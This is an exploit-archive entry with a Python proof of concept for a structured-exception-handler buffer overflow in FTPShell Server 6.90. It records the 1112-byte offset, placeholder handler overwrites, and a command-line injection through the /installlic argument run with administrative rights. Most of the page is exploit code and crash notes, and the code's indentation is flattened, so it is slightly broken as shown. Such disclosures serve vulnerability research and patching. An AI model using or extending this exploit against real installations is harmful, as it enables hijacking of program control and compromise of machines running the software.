FTPShell Server 6.90 Buffer Overflow

FTPShell Server version 6.90 buffer overflow proof of concept exploit.


MD5 | 9718fbd811cb07974f8ee049fd1df66d

# Exploit Title: FTPShell Server 6.90 (ftpshelldmgr.exe)- Buffer Overflow (SEH)(PoC)
# Exploit Author: Saeed reza Zamanian
# Date: 2020-07-01
# Vendor: Code Origin
# Vendor Homepage: https://www.ftpshell.com/
# Software Link: https://www.ftpshell.com/downloadserver.htm
# Version: 6.90 Release Date : Jan 31, 2020
# Tested On: Windows 7 Ultimate -- Build 7601 x64-based PC
# Tested On: Windows Vista SP2 -- build 6002 32-bit
#
# Replicate Crash:
# 1) Download, Install, the application
# 2) Execute the exploit (with administrative permissions)
# 3) Crash with SEH Overwrite
#
# You can also use "/installlic {PAYLOAD}" in arguments field in your debugger (immunity or olly)

# SEH chain of main thread
# Address SE handler
# 0020FBFC 43434343
# 42424242 *** CORRUPT ENTRY ***


#!/usr/bin/python
import os

directory = 'C:\Program Files\FTPShellServer\\' #default
#directory = 'C:\Program Files (x86)\FTPShellServer\\' #directory_for_x64

offset = '\x41'*1112
nSEH = '\x42\x42\x42\x42'
SEH = '\x43\x43\x43\x43'

payload = offset+nSEH+SEH

try:
print("[+] Creating %s sending evil payload." %len(payload))
comm = ('cd '+directory+' && ftpshelldmgr.exe /installlic '+payload)
stream = os.popen(comm)
output = stream.read()
print("[+] payload sent!")
except:
print("Failed.")


Related Posts